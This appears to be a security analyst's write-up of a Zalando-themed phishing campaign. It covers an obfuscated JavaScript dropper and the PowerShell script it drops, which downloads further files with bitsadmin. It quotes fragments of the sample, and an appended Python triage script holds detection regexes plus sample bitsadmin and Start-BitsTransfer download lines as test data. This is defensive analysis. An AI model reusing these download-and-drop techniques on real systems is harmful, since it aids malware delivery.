We get daily emails from well-known brands (like DHL, PayPal, Netflix, Microsoft, Dropbox, Apple, etc). Recently, I received a bunch of phishing emails targeting Zalando customers. Zalando is a German retailer of shoes and fashion across Europe. It was the first time that I saw them used in a phishing campaign.

The attached archive contains a single JavaScript file:

```
zipdump.py nine-life1107.zip
```

As usual, with this language, the script is pretty well obfuscated. Diving into the code to spot interesting strings or techniques is always interesting. Here is an example of an implemented function:

```javascript
var z = -parseInt(s(hw.E, hw.i)) / 0x1 + parseInt(J(hw.u, hw.z)) / 0x2 * (parseInt(J(hw.S, hw.L)) / 0x3) + -parseInt(o(hw.T, hw.f)) / 0x4 * (parseInt(s(hw.R, hw.Q)) / 0x5) + parseInt(V(hw.g, hw.n)) / 0x6 + -parseInt(V('0x22f', hw.d)) / 0x7 + parseInt(D(hw.l, hw.W)) / 0x8 + -parseInt(o(hw.c, hw.x)) / 0x9
```

We are facing a script for Windows. The script contains some references to "WScript" to call the method "ShellExecute"…

The script is a dropper and will drop/execute a PowerShell script: `C:\Users\user01\AppData\Roaming\42c0tyi.ps1`

The script is less heavily obfuscated and easy to understand. It uses bitsadmin.exe, the well-known LOLbin, to download many files from a website. This tool can be called directly from PowerShell. The script checks if BitsAdmin and ExpandArchive are available inside PowerShell and uses them. That's what the attacker is testing in this case:

```powershell
$PsaB17=Get-Command Start-BitsTransfer -ErrorAction SilentlyContinue
$g3tSp4=Get-Command expand-archive -ErrorAction SilentlyContinue
```

Otherwise, it will launch the standalone executable and download files one by one.
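An added example, not code from the diary or from the sample it analyses: a small Python triage pass over PowerShell script-block log text that flags the behaviour described above, namely the capability probe (Get-Command on Start-BitsTransfer / Expand-Archive with errors silenced), a BITS or bitsadmin.exe transfer, and a file written under AppData\Roaming. The log lines, URLs and variable names are constructed for the example.

```python
import re

# Constructed script-block snippets (not the diary's sample), modelled on the
# probe-then-fallback download logic the dropped .ps1 performs.
SAMPLE_BLOCKS = [
    ("probe", '$PsaB17=Get-Command Start-BitsTransfer -ErrorAction SilentlyContinue; '
              '$g3tSp4=Get-Command expand-archive -ErrorAction SilentlyContinue'),
    ("bits_dl", 'Start-BitsTransfer -Source http://example.invalid/a.zip '
                '-Destination $env:APPDATA\\a.zip'),
    ("lolbin", 'bitsadmin.exe /transfer job1 http://example.invalid/b.bin '
               'C:\\Users\\user01\\AppData\\Roaming\\b.bin'),
    ("benign", 'Get-Command Get-ChildItem; Get-ChildItem -Path C:\\Temp'),
]

PATTERNS = {
    # Testing whether the BITS / archive cmdlets exist, with errors suppressed,
    # is the "check before falling back to bitsadmin.exe" step from the diary.
    "cmdlet_probe": re.compile(
        r"Get-Command\s+(Start-BitsTransfer|Expand-Archive)\b[^;\n]*"
        r"-(?:ErrorAction|ea)\s+SilentlyContinue", re.I),
    # A network transfer through the BITS cmdlet or the bitsadmin.exe LOLBin.
    "bits_download": re.compile(
        r"(Start-BitsTransfer\b.*-Source\s+\S*https?://|bitsadmin(\.exe)?\s+/transfer)",
        re.I),
    # A payload written under the roaming profile, like the dropped .ps1.
    "appdata_drop": re.compile(r"AppData\\Roaming\\[^\s'\"]+", re.I),
}


def score_block(text):
    """Return the set of indicator names that match one script block."""
    return {name for name, rx in PATTERNS.items() if rx.search(text)}


def triage(blocks):
    """Map each block label to its sorted indicators; several hits merit a look."""
    return {label: sorted(score_block(text)) for label, text in blocks}


if __name__ == "__main__":
    for label, hits in triage(SAMPLE_BLOCKS).items():
        print(f"{label:8s} {hits}")
```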